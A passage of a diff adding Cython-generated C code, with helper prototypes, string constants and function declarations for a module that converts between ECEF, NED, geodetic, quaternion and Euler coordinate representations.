kw_name); + +/* ParseKeywords.proto */ +static int __Pyx_ParseOptionalKeywords(PyObject *kwds, PyObject *const *kwvalues, + PyObject **argnames[], + PyObject *kwds2, PyObject *values[], Py_ssize_t num_pos_args, + const char* function_name); + +/* RaiseArgTupleInvalid.proto */ +static void __Pyx_RaiseArgtupleInvalid(const char* func_name, int exact, + Py_ssize_t num_min, Py_ssize_t num_max, Py_ssize_t num_found); + +/* MoveIfSupported.proto */ +#if __cplusplus >= 201103L || (defined(_MSC_VER) && _MSC_VER >= 1600) + #include + #define __PYX_STD_MOVE_IF_SUPPORTED(x) std::move(x) +#else + #define __PYX_STD_MOVE_IF_SUPPORTED(x) x +#endif + +/* KeywordStringCheck.proto */ +static int __Pyx_CheckKeywordStrings(PyObject *kw, const char* function_name, int kw_allowed); + +/* IncludeStructmemberH.proto */ +#include + +/* FixUpExtensionType.proto */ +#if CYTHON_USE_TYPE_SPECS +static int __Pyx_fix_up_extension_type_from_spec(PyType_Spec *spec, PyTypeObject *type); +#endif + +/* PyObjectCallNoArg.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallNoArg(PyObject *func); + +/* PyObjectCallOneArg.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallOneArg(PyObject *func, PyObject *arg); + +/* PyObjectGetMethod.proto */ +static int __Pyx_PyObject_GetMethod(PyObject *obj, PyObject *name, PyObject **method); + +/* PyObjectCallMethod0.proto */ +static PyObject* __Pyx_PyObject_CallMethod0(PyObject* obj, PyObject* method_name); + +/* ValidateBasesTuple.proto */ +#if CYTHON_COMPILING_IN_CPYTHON || CYTHON_COMPILING_IN_LIMITED_API || CYTHON_USE_TYPE_SPECS +static int __Pyx_validate_bases_tuple(const char *type_name, Py_ssize_t dictoffset, PyObject *bases); +#endif + +/* PyType_Ready.proto */ +CYTHON_UNUSED static int __Pyx_PyType_Ready(PyTypeObject *t); + +/* PyObject_GenericGetAttrNoDict.proto */ +#if CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP && PY_VERSION_HEX < 0x03070000 +static CYTHON_INLINE PyObject* __Pyx_PyObject_GenericGetAttrNoDict(PyObject* obj, PyObject* attr_name); +#else +#define __Pyx_PyObject_GenericGetAttrNoDict PyObject_GenericGetAttr +#endif + +/* PyObject_GenericGetAttr.proto */ +#if CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP && PY_VERSION_HEX < 0x03070000 +static PyObject* __Pyx_PyObject_GenericGetAttr(PyObject* obj, PyObject* attr_name); +#else +#define __Pyx_PyObject_GenericGetAttr PyObject_GenericGetAttr +#endif + +/* SetupReduce.proto */ +#if !CYTHON_COMPILING_IN_LIMITED_API +static int __Pyx_setup_reduce(PyObject* type_obj); +#endif + +/* TypeImport.proto */ +#ifndef __PYX_HAVE_RT_ImportType_proto_3_0_0 +#define __PYX_HAVE_RT_ImportType_proto_3_0_0 +#if defined (__STDC_VERSION__) && __STDC_VERSION__ >= 201112L +#include +#endif +#if (defined (__STDC_VERSION__) && __STDC_VERSION__ >= 201112L) || __cplusplus >= 201103L +#define __PYX_GET_STRUCT_ALIGNMENT_3_0_0(s) alignof(s) +#else +#define __PYX_GET_STRUCT_ALIGNMENT_3_0_0(s) sizeof(void*) +#endif +enum __Pyx_ImportType_CheckSize_3_0_0 { + __Pyx_ImportType_CheckSize_Error_3_0_0 = 0, + __Pyx_ImportType_CheckSize_Warn_3_0_0 = 1, + __Pyx_ImportType_CheckSize_Ignore_3_0_0 = 2 +}; +static PyTypeObject *__Pyx_ImportType_3_0_0(PyObject* module, const char *module_name, const char *class_name, size_t size, size_t alignment, enum __Pyx_ImportType_CheckSize_3_0_0 check_size); +#endif + +/* Import.proto */ +static PyObject *__Pyx_Import(PyObject *name, PyObject *from_list, int level); + +/* ImportDottedModule.proto */ +static PyObject *__Pyx_ImportDottedModule(PyObject *name, PyObject *parts_tuple); +#if PY_MAJOR_VERSION >= 3 +static PyObject *__Pyx_ImportDottedModule_WalkParts(PyObject *module, PyObject *name, PyObject *parts_tuple); +#endif + +/* FetchSharedCythonModule.proto */ +static PyObject *__Pyx_FetchSharedCythonABIModule(void); + +/* FetchCommonType.proto */ +#if !CYTHON_USE_TYPE_SPECS +static PyTypeObject* __Pyx_FetchCommonType(PyTypeObject* type); +#else +static PyTypeObject* __Pyx_FetchCommonTypeFromSpec(PyObject *module, PyType_Spec *spec, PyObject *bases); +#endif + +/* PyMethodNew.proto */ +#if PY_MAJOR_VERSION >= 3 +static PyObject *__Pyx_PyMethod_New(PyObject *func, PyObject *self, PyObject *typ) { + CYTHON_UNUSED_VAR(typ); + if (!self) + return __Pyx_NewRef(func); + return PyMethod_New(func, self); +} +#else + #define __Pyx_PyMethod_New PyMethod_New +#endif + +/* PyVectorcallFastCallDict.proto */ +#if CYTHON_METH_FASTCALL +static CYTHON_INLINE PyObject *__Pyx_PyVectorcall_FastCallDict(PyObject *func, __pyx_vectorcallfunc vc, PyObject *const *args, size_t nargs, PyObject *kw); +#endif + +/* CythonFunctionShared.proto */ +#define __Pyx_CyFunction_USED +#define __Pyx_CYFUNCTION_STATICMETHOD 0x01 +#define __Pyx_CYFUNCTION_CLASSMETHOD 0x02 +#define __Pyx_CYFUNCTION_CCLASS 0x04 +#define __Pyx_CYFUNCTION_COROUTINE 0x08 +#define __Pyx_CyFunction_GetClosure(f)\ + (((__pyx_CyFunctionObject *) (f))->func_closure) +#if PY_VERSION_HEX < 0x030900B1 + #define __Pyx_CyFunction_GetClassObj(f)\ + (((__pyx_CyFunctionObject *) (f))->func_classobj) +#else + #define __Pyx_CyFunction_GetClassObj(f)\ + ((PyObject*) ((PyCMethodObject *) (f))->mm_class) +#endif +#define __Pyx_CyFunction_SetClassObj(f, classobj)\ + __Pyx__CyFunction_SetClassObj((__pyx_CyFunctionObject *) (f), (classobj)) +#define __Pyx_CyFunction_Defaults(type, f)\ + ((type *)(((__pyx_CyFunctionObject *) (f))->defaults)) +#define __Pyx_CyFunction_SetDefaultsGetter(f, g)\ + ((__pyx_CyFunctionObject *) (f))->defaults_getter = (g) +typedef struct { +#if PY_VERSION_HEX < 0x030900B1 + PyCFunctionObject func; +#else + PyCMethodObject func; +#endif +#if CYTHON_BACKPORT_VECTORCALL + __pyx_vectorcallfunc func_vectorcall; +#endif +#if PY_VERSION_HEX < 0x030500A0 + PyObject *func_weakreflist; +#endif + PyObject *func_dict; + PyObject *func_name; + PyObject *func_qualname; + PyObject *func_doc; + PyObject *func_globals; + PyObject *func_code; + PyObject *func_closure; +#if PY_VERSION_HEX < 0x030900B1 + PyObject *func_classobj; +#endif + void *defaults; + int defaults_pyobjects; + size_t defaults_size; // used by FusedFunction for copying defaults + int flags; + PyObject *defaults_tuple; + PyObject *defaults_kwdict; + PyObject *(*defaults_getter)(PyObject *); + PyObject *func_annotations; + PyObject *func_is_coroutine; +} __pyx_CyFunctionObject; +#define __Pyx_CyFunction_Check(obj) __Pyx_TypeCheck(obj, __pyx_CyFunctionType) +#define __Pyx_IsCyOrPyCFunction(obj) __Pyx_TypeCheck2(obj, __pyx_CyFunctionType, &PyCFunction_Type) +#define __Pyx_CyFunction_CheckExact(obj) __Pyx_IS_TYPE(obj, __pyx_CyFunctionType) +static PyObject *__Pyx_CyFunction_Init(__pyx_CyFunctionObject* op, PyMethodDef *ml, + int flags, PyObject* qualname, + PyObject *closure, + PyObject *module, PyObject *globals, + PyObject* code); +static CYTHON_INLINE void __Pyx__CyFunction_SetClassObj(__pyx_CyFunctionObject* f, PyObject* classobj); +static CYTHON_INLINE void *__Pyx_CyFunction_InitDefaults(PyObject *m, + size_t size, + int pyobjects); +static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsTuple(PyObject *m, + PyObject *tuple); +static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsKwDict(PyObject *m, + PyObject *dict); +static CYTHON_INLINE void __Pyx_CyFunction_SetAnnotationsDict(PyObject *m, + PyObject *dict); +static int __pyx_CyFunction_init(PyObject *module); +#if CYTHON_METH_FASTCALL +static PyObject * __Pyx_CyFunction_Vectorcall_NOARGS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); +static PyObject * __Pyx_CyFunction_Vectorcall_O(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); +static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); +static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS_METHOD(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); +#if CYTHON_BACKPORT_VECTORCALL +#define __Pyx_CyFunction_func_vectorcall(f) (((__pyx_CyFunctionObject*)f)->func_vectorcall) +#else +#define __Pyx_CyFunction_func_vectorcall(f) (((PyCFunctionObject*)f)->vectorcall) +#endif +#endif + +/* CythonFunction.proto */ +static PyObject *__Pyx_CyFunction_New(PyMethodDef *ml, + int flags, PyObject* qualname, + PyObject *closure, + PyObject *module, PyObject *globals, + PyObject* code); + +/* ClassMethod.proto */ +#include "descrobject.h" +CYTHON_UNUSED static PyObject* __Pyx_Method_ClassMethod(PyObject *method); + +/* GetNameInClass.proto */ +#define __Pyx_GetNameInClass(var, nmspace, name) (var) = __Pyx__GetNameInClass(nmspace, name) +static PyObject *__Pyx__GetNameInClass(PyObject *nmspace, PyObject *name); + +/* CLineInTraceback.proto */ +#ifdef CYTHON_CLINE_IN_TRACEBACK +#define __Pyx_CLineForTraceback(tstate, c_line) (((CYTHON_CLINE_IN_TRACEBACK)) ? c_line : 0) +#else +static int __Pyx_CLineForTraceback(PyThreadState *tstate, int c_line); +#endif + +/* CodeObjectCache.proto */ +#if !CYTHON_COMPILING_IN_LIMITED_API +typedef struct { + PyCodeObject* code_object; + int code_line; +} __Pyx_CodeObjectCacheEntry; +struct __Pyx_CodeObjectCache { + int count; + int max_count; + __Pyx_CodeObjectCacheEntry* entries; +}; +static struct __Pyx_CodeObjectCache __pyx_code_cache = {0,0,NULL}; +static int __pyx_bisect_code_objects(__Pyx_CodeObjectCacheEntry* entries, int count, int code_line); +static PyCodeObject *__pyx_find_code_object(int code_line); +static void __pyx_insert_code_object(int code_line, PyCodeObject* code_object); +#endif + +/* AddTraceback.proto */ +static void __Pyx_AddTraceback(const char *funcname, int c_line, + int py_line, const char *filename); + +/* BufferStructDeclare.proto */ +typedef struct { + Py_ssize_t shape, strides, suboffsets; +} __Pyx_Buf_DimInfo; +typedef struct { + size_t refcount; + Py_buffer pybuffer; +} __Pyx_Buffer; +typedef struct { + __Pyx_Buffer *rcbuffer; + char *data; + __Pyx_Buf_DimInfo diminfo[8]; +} __Pyx_LocalBuf_ND; + +#if PY_MAJOR_VERSION < 3 + static int __Pyx_GetBuffer(PyObject *obj, Py_buffer *view, int flags); + static void __Pyx_ReleaseBuffer(Py_buffer *view); +#else + #define __Pyx_GetBuffer PyObject_GetBuffer + #define __Pyx_ReleaseBuffer PyBuffer_Release +#endif + + +/* GCCDiagnostics.proto */ +#if !defined(__INTEL_COMPILER) && defined(__GNUC__) && (__GNUC__ > 4 || (__GNUC__ == 4 && __GNUC_MINOR__ >= 6)) +#define __Pyx_HAS_GCC_DIAGNOSTIC +#endif + +/* RealImag.proto */ +#if CYTHON_CCOMPLEX + #ifdef __cplusplus + #define __Pyx_CREAL(z) ((z).real()) + #define __Pyx_CIMAG(z) ((z).imag()) + #else + #define __Pyx_CREAL(z) (__real__(z)) + #define __Pyx_CIMAG(z) (__imag__(z)) + #endif +#else + #define __Pyx_CREAL(z) ((z).real) + #define __Pyx_CIMAG(z) ((z).imag) +#endif +#if defined(__cplusplus) && CYTHON_CCOMPLEX\ + && (defined(_WIN32) || defined(__clang__) || (defined(__GNUC__) && (__GNUC__ >= 5 || __GNUC__ == 4 && __GNUC_MINOR__ >= 4 )) || __cplusplus >= 201103) + #define __Pyx_SET_CREAL(z,x) ((z).real(x)) + #define __Pyx_SET_CIMAG(z,y) ((z).imag(y)) +#else + #define __Pyx_SET_CREAL(z,x) __Pyx_CREAL(z) = (x) + #define __Pyx_SET_CIMAG(z,y) __Pyx_CIMAG(z) = (y) +#endif + +/* Arithmetic.proto */ +#if CYTHON_CCOMPLEX && (1) && (!0 || __cplusplus) + #define __Pyx_c_eq_float(a, b) ((a)==(b)) + #define __Pyx_c_sum_float(a, b) ((a)+(b)) + #define __Pyx_c_diff_float(a, b) ((a)-(b)) + #define __Pyx_c_prod_float(a, b) ((a)*(b)) + #define __Pyx_c_quot_float(a, b) ((a)/(b)) + #define __Pyx_c_neg_float(a) (-(a)) + #ifdef __cplusplus + #define __Pyx_c_is_zero_float(z) ((z)==(float)0) + #define __Pyx_c_conj_float(z) (::std::conj(z)) + #if 1 + #define __Pyx_c_abs_float(z) (::std::abs(z)) + #define __Pyx_c_pow_float(a, b) (::std::pow(a, b)) + #endif + #else + #define __Pyx_c_is_zero_float(z) ((z)==0) + #define __Pyx_c_conj_float(z) (conjf(z)) + #if 1 + #define __Pyx_c_abs_float(z) (cabsf(z)) + #define __Pyx_c_pow_float(a, b) (cpowf(a, b)) + #endif + #endif +#else + static CYTHON_INLINE int __Pyx_c_eq_float(__pyx_t_float_complex, __pyx_t_float_complex); + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_sum_float(__pyx_t_float_complex, __pyx_t_float_complex); + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_diff_float(__pyx_t_float_complex, __pyx_t_float_complex); + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_prod_float(__pyx_t_float_complex, __pyx_t_float_complex); + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_quot_float(__pyx_t_float_complex, __pyx_t_float_complex); + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_neg_float(__pyx_t_float_complex); + static CYTHON_INLINE int __Pyx_c_is_zero_float(__pyx_t_float_complex); + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_conj_float(__pyx_t_float_complex); + #if 1 + static CYTHON_INLINE float __Pyx_c_abs_float(__pyx_t_float_complex); + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_pow_float(__pyx_t_float_complex, __pyx_t_float_complex); + #endif +#endif + +/* Arithmetic.proto */ +#if CYTHON_CCOMPLEX && (1) && (!0 || __cplusplus) + #define __Pyx_c_eq_double(a, b) ((a)==(b)) + #define __Pyx_c_sum_double(a, b) ((a)+(b)) + #define __Pyx_c_diff_double(a, b) ((a)-(b)) + #define __Pyx_c_prod_double(a, b) ((a)*(b)) + #define __Pyx_c_quot_double(a, b) ((a)/(b)) + #define __Pyx_c_neg_double(a) (-(a)) + #ifdef __cplusplus + #define __Pyx_c_is_zero_double(z) ((z)==(double)0) + #define __Pyx_c_conj_double(z) (::std::conj(z)) + #if 1 + #define __Pyx_c_abs_double(z) (::std::abs(z)) + #define __Pyx_c_pow_double(a, b) (::std::pow(a, b)) + #endif + #else + #define __Pyx_c_is_zero_double(z) ((z)==0) + #define __Pyx_c_conj_double(z) (conj(z)) + #if 1 + #define __Pyx_c_abs_double(z) (cabs(z)) + #define __Pyx_c_pow_double(a, b) (cpow(a, b)) + #endif + #endif +#else + static CYTHON_INLINE int __Pyx_c_eq_double(__pyx_t_double_complex, __pyx_t_double_complex); + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_sum_double(__pyx_t_double_complex, __pyx_t_double_complex); + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_diff_double(__pyx_t_double_complex, __pyx_t_double_complex); + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_prod_double(__pyx_t_double_complex, __pyx_t_double_complex); + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_quot_double(__pyx_t_double_complex, __pyx_t_double_complex); + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_neg_double(__pyx_t_double_complex); + static CYTHON_INLINE int __Pyx_c_is_zero_double(__pyx_t_double_complex); + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_conj_double(__pyx_t_double_complex); + #if 1 + static CYTHON_INLINE double __Pyx_c_abs_double(__pyx_t_double_complex); + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_pow_double(__pyx_t_double_complex, __pyx_t_double_complex); + #endif +#endif + +/* CIntToPy.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyInt_From_long(long value); + +/* FormatTypeName.proto */ +#if CYTHON_COMPILING_IN_LIMITED_API +typedef PyObject *__Pyx_TypeName; +#define __Pyx_FMT_TYPENAME "%U" +static __Pyx_TypeName __Pyx_PyType_GetName(PyTypeObject* tp); +#define __Pyx_DECREF_TypeName(obj) Py_XDECREF(obj) +#else +typedef const char *__Pyx_TypeName; +#define __Pyx_FMT_TYPENAME "%.200s" +#define __Pyx_PyType_GetName(tp) ((tp)->tp_name) +#define __Pyx_DECREF_TypeName(obj) +#endif + +/* CIntFromPy.proto */ +static CYTHON_INLINE long __Pyx_PyInt_As_long(PyObject *); + +/* CIntFromPy.proto */ +static CYTHON_INLINE int __Pyx_PyInt_As_int(PyObject *); + +/* FastTypeChecks.proto */ +#if CYTHON_COMPILING_IN_CPYTHON +#define __Pyx_TypeCheck(obj, type) __Pyx_IsSubtype(Py_TYPE(obj), (PyTypeObject *)type) +#define __Pyx_TypeCheck2(obj, type1, type2) __Pyx_IsAnySubtype2(Py_TYPE(obj), (PyTypeObject *)type1, (PyTypeObject *)type2) +static CYTHON_INLINE int __Pyx_IsSubtype(PyTypeObject *a, PyTypeObject *b); +static CYTHON_INLINE int __Pyx_IsAnySubtype2(PyTypeObject *cls, PyTypeObject *a, PyTypeObject *b); +static CYTHON_INLINE int __Pyx_PyErr_GivenExceptionMatches(PyObject *err, PyObject *type); +static CYTHON_INLINE int __Pyx_PyErr_GivenExceptionMatches2(PyObject *err, PyObject *type1, PyObject *type2); +#else +#define __Pyx_TypeCheck(obj, type) PyObject_TypeCheck(obj, (PyTypeObject *)type) +#define __Pyx_TypeCheck2(obj, type1, type2) (PyObject_TypeCheck(obj, (PyTypeObject *)type1) || PyObject_TypeCheck(obj, (PyTypeObject *)type2)) +#define __Pyx_PyErr_GivenExceptionMatches(err, type) PyErr_GivenExceptionMatches(err, type) +#define __Pyx_PyErr_GivenExceptionMatches2(err, type1, type2) (PyErr_GivenExceptionMatches(err, type1) || PyErr_GivenExceptionMatches(err, type2)) +#endif +#define __Pyx_PyErr_ExceptionMatches2(err1, err2) __Pyx_PyErr_GivenExceptionMatches2(__Pyx_PyErr_CurrentExceptionType(), err1, err2) +#define __Pyx_PyException_Check(obj) __Pyx_TypeCheck(obj, PyExc_Exception) + +/* CheckBinaryVersion.proto */ +static int __Pyx_check_binary_version(void); + +/* InitStrings.proto */ +static int __Pyx_InitStrings(__Pyx_StringTabEntry *t); + +/* #### Code section: module_declarations ### */ +static CYTHON_INLINE PyObject *__pyx_f_5numpy_7ndarray_4base_base(PyArrayObject *__pyx_v_self); /* proto*/ +static CYTHON_INLINE PyArray_Descr *__pyx_f_5numpy_7ndarray_5descr_descr(PyArrayObject *__pyx_v_self); /* proto*/ +static CYTHON_INLINE int __pyx_f_5numpy_7ndarray_4ndim_ndim(PyArrayObject *__pyx_v_self); /* proto*/ +static CYTHON_INLINE npy_intp *__pyx_f_5numpy_7ndarray_5shape_shape(PyArrayObject *__pyx_v_self); /* proto*/ +static CYTHON_INLINE npy_intp *__pyx_f_5numpy_7ndarray_7strides_strides(PyArrayObject *__pyx_v_self); /* proto*/ +static CYTHON_INLINE npy_intp __pyx_f_5numpy_7ndarray_4size_size(PyArrayObject *__pyx_v_self); /* proto*/ +static CYTHON_INLINE char *__pyx_f_5numpy_7ndarray_4data_data(PyArrayObject *__pyx_v_self); /* proto*/ + +/* Module declarations from "libcpp" */ + +/* Module declarations from "cython" */ + +/* Module declarations from "libc.string" */ + +/* Module declarations from "libc.stdio" */ + +/* Module declarations from "__builtin__" */ + +/* Module declarations from "cpython.type" */ + +/* Module declarations from "cpython" */ + +/* Module declarations from "cpython.object" */ + +/* Module declarations from "cpython.ref" */ + +/* Module declarations from "numpy" */ + +/* Module declarations from "numpy" */ + +/* Module declarations from "common.transformations.transformations" */ +static PyArrayObject *__pyx_f_6common_15transformations_15transformations_matrix2numpy(Eigen::Matrix3d); /*proto*/ +static Eigen::Matrix3d __pyx_f_6common_15transformations_15transformations_numpy2matrix(PyArrayObject *); /*proto*/ +static struct ECEF __pyx_f_6common_15transformations_15transformations_list2ecef(PyObject *); /*proto*/ +static struct NED __pyx_f_6common_15transformations_15transformations_list2ned(PyObject *); /*proto*/ +static struct Geodetic __pyx_f_6common_15transformations_15transformations_list2geodetic(PyObject *); /*proto*/ +/* #### Code section: typeinfo ### */ +static __Pyx_TypeInfo __Pyx_TypeInfo_double = { "double", NULL, sizeof(double), { 0 }, 0, 'R', 0, 0 }; +/* #### Code section: before_global_var ### */ +#define __Pyx_MODULE_NAME "common.transformations.transformations" +extern int __pyx_module_is_main_common__transformations__transformations; +int __pyx_module_is_main_common__transformations__transformations = 0; + +/* Implementation of "common.transformations.transformations" */ +/* #### Code section: global_var ### */ +static PyObject *__pyx_builtin_AssertionError; +static PyObject *__pyx_builtin_TypeError; +static PyObject *__pyx_builtin_ImportError; +/* #### Code section: string_decls ### */ +static const char __pyx_k_e[] = "e"; +static const char __pyx_k_g[] = "g"; +static const char __pyx_k_n[] = "n"; +static const char __pyx_k_q[] = "q"; +static const char __pyx_k_r[] = "r"; +static const char __pyx_k__3[] = "*"; +static const char __pyx_k_gc[] = "gc"; +static const char __pyx_k_np[] = "np"; +static const char __pyx_k__42[] = "?"; +static const char __pyx_k_cls[] = "cls"; +static const char __pyx_k_ned[] = "ned"; +static const char __pyx_k_rot[] = "rot"; +static const char __pyx_k_yaw[] = "yaw"; +static const char __pyx_k_dict[] = "__dict__"; +static const char __pyx_k_ecef[] = "ecef"; +static const char __pyx_k_init[] = "init"; +static const char __pyx_k_main[] = "__main__"; +static const char __pyx_k_name[] = "__name__"; +static const char __pyx_k_pose[] = "pose"; +static const char __pyx_k_quat[] = "quat"; +static const char __pyx_k_roll[] = "roll"; +static const char __pyx_k_self[] = "self"; +static const char __pyx_k_spec[] = "__spec__"; +static const char __pyx_k_test[] = "__test__"; +static const char __pyx_k_array[] = "array"; +static const char __pyx_k_dtype[] = "dtype"; +static const char __pyx_k_euler[] = "euler"; +static const char __pyx_k_numpy[] = "numpy"; +static const char __pyx_k_pitch[] = "pitch"; +static const char __pyx_k_double[] = "double"; +static const char __pyx_k_enable[] = "enable"; +static const char __pyx_k_import[] = "__import__"; +static const char __pyx_k_reduce[] = "__reduce__"; +static const char __pyx_k_disable[] = "disable"; +static const char __pyx_k_geodetic[] = "geodetic"; +static const char __pyx_k_getstate[] = "__getstate__"; +static const char __pyx_k_ned_pose[] = "ned_pose"; +static const char __pyx_k_setstate[] = "__setstate__"; +static const char __pyx_k_TypeError[] = "TypeError"; +static const char __pyx_k_ecef_init[] = "ecef_init"; +static const char __pyx_k_ecef_pose[] = "ecef_pose"; +static const char __pyx_k_from_ecef[] = "from_ecef"; +static const char __pyx_k_isenabled[] = "isenabled"; +static const char __pyx_k_pyx_state[] = "__pyx_state"; +static const char __pyx_k_reduce_ex[] = "__reduce_ex__"; +static const char __pyx_k_LocalCoord[] = "LocalCoord"; +static const char __pyx_k_rot_matrix[] = "rot_matrix"; +static const char __pyx_k_ImportError[] = "ImportError"; +static const char __pyx_k_initializing[] = "_initializing"; +static const char __pyx_k_is_coroutine[] = "_is_coroutine"; +static const char __pyx_k_stringsource[] = ""; +static const char __pyx_k_from_geodetic[] = "from_geodetic"; +static const char __pyx_k_reduce_cython[] = "__reduce_cython__"; +static const char __pyx_k_AssertionError[] = "AssertionError"; +static const char __pyx_k_asfortranarray[] = "asfortranarray"; +static const char __pyx_k_ecef2ned_matrix[] = "ecef2ned_matrix"; +static const char __pyx_k_ecef2ned_single[] = "ecef2ned_single"; +static const char __pyx_k_ned2ecef_matrix[] = "ned2ecef_matrix"; +static const char __pyx_k_ned2ecef_single[] = "ned2ecef_single"; +static const char __pyx_k_quat2rot_single[] = "quat2rot_single"; +static const char __pyx_k_rot2quat_single[] = "rot2quat_single"; +static const char __pyx_k_setstate_cython[] = "__setstate_cython__"; +static const char __pyx_k_euler2rot_single[] = "euler2rot_single"; +static const char __pyx_k_rot2euler_single[] = "rot2euler_single"; +static const char __pyx_k_euler2quat_single[] = "euler2quat_single"; +static const char __pyx_k_quat2euler_single[] = "quat2euler_single"; +static const char __pyx_k_asyncio_coroutines[] = "asyncio.coroutines"; +static const char __pyx_k_cline_in_traceback[] = "cline_in_traceback"; +static const char __pyx_k_geodetic2ned_single[] = "geodetic2ned_single"; +static const char __pyx_k_ned2geodetic_single[] = "ned2geodetic_single"; +static const char __pyx_k_LocalCoord_from_ecef[] = "LocalCoord.from_ecef"; +static const char __pyx_k_ecef2geodetic_single[] = "ecef2geodetic_single"; +static const char __pyx_k_geodetic2ecef_single[] = "geodetic2ecef_single"; +static const char __pyx_k_LocalCoord_from_geodetic[] = "LocalCoord.from_geodetic"; +static const char __pyx_k_LocalCoord___reduce_cython[] = "LocalCoord.__reduce_cython__"; +static const char __pyx_k_LocalCoord_ecef2ned_single[] = "LocalCoord.ecef2ned_single"; +static const char __pyx_k_LocalCoord_ned2ecef_single[] = "LocalCoord.ned2ecef_single"; +static const char __pyx_k_ecef_euler_from_ned_single[] = "ecef_euler_from_ned_single"; +static const char __pyx_k_ned_euler_from_ecef_single[] = "ned_euler_from_ecef_single"; +static const char __pyx_k_LocalCoord___setstate_cython[] = "LocalCoord.__setstate_cython__"; +static const char __pyx_k_LocalCoord_geodetic2ned_single[] = "LocalCoord.geodetic2ned_single"; +static const char __pyx_k_LocalCoord_ned2geodetic_single[] = "LocalCoord.ned2geodetic_single"; +static const char __pyx_k_numpy_core_multiarray_failed_to[] = "numpy.core.multiarray failed to import"; +static const char __pyx_k_common_transformations_transform[] = "common/transformations/transformations.pyx"; +static const char __pyx_k_numpy_core_umath_failed_to_impor[] = "numpy.core.umath failed to import"; +static const char __pyx_k_self_lc_cannot_be_converted_to_a[] = "self.lc cannot be converted to a Python object for pickling"; +static const char __pyx_k_common_transformations_transform_2[] = "common.transformations.transformations"; +/* #### Code section: decls ### */ +static PyObject *__pyx_pf_6common_15transformations_15transformations_euler2quat_single(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_euler); /* proto */ +static PyObject *__pyx_pf_6common_15transformations_15transformations_2quat2euler_single(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_quat); /* proto */ +static PyObject *__pyx_pf_6common_15transformations_15transformations_4quat2rot_single(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_quat); /* proto */ +static PyObject *__pyx_pf_6common_15transformations_15transformations_6rot2quat_single(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_rot); /* proto */ +static PyObject *__pyx_pf_6common_15transformations_15transformations_8euler2rot_single(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_euler); /* proto */ +static PyObject *__pyx_pf_6common_15transformations_15transformations_10rot2euler_single(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_rot); /* proto */ +static PyObject *__pyx_pf_6common_15transformations_15transformations_12rot_matrix(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_roll, PyObject *__pyx_v_pitch, PyObject *__pyx_v_yaw); /* proto */ +static PyObject *__pyx_pf_6common_15transformations_15transformations_14ecef_euler_from_ned_single(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_ecef_init, PyObject *__pyx_v_ned_pose); /* proto */ +static PyObject *__pyx_pf_6common_15transformations_15transformations_16ned_euler_from_ecef_single(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_ecef_init, PyObject *__pyx_v_ecef_pose); /* proto */ +static PyObject *__pyx_pf_6common_15transformations_15transformations_18geodetic2ecef_single(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_geodetic); /* proto */ +static PyObject *__pyx_pf_6common_15transformations_15transformations_20ecef2geodetic_single(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_ecef); /* proto */ +static int __pyx_pf_6common_15transformations_15transformations_10LocalCoord___init__(struct __pyx_obj_6common_15transformations_15transformations_LocalCoord *__pyx_v_self, PyObject *__pyx_v_geodetic, PyObject *__pyx_v_ecef); /* proto */ +static PyObject *__pyx_pf_6common_15transformations_15transformations_10LocalCoord_15ned2ecef_matrix___get__(struct __pyx_obj_6common_15transformations_15transformations_LocalCoord *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6common_15transformations_15transformations_10LocalCoord_15ecef2ned_matrix___get__(struct __pyx_obj_6common_15transformations_15transformations_LocalCoord *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6common_15transformations_15transformations_10LocalCoord_20ned_from_ecef_matrix___get__(struct __pyx_obj_6common_15transformations_15transformations_LocalCoord *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6common_15transformations_15transformations_10LocalCoord_20ecef_from_ned_matrix___get__(struct __pyx_obj_6common_15transformations_15transformations_LocalCoord *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6common_15transformations_15transformations_10LocalCoord_2from_geodetic(PyTypeObject *__pyx_v_cls, PyObject *__pyx_v_geodetic); /* proto */ +static PyObject *__pyx_pf_6common_15transformations_15transformations_10LocalCoord_4from_ecef(PyTypeObject *__pyx_v_cls, PyObject *__pyx_v_ecef); /* proto */ +static PyObject *__pyx_pf_6common_15transformations_15transformations_10LocalCoord_6ecef2ned_single(struct __pyx_obj_6common_15transformations_15transformations_LocalCoord 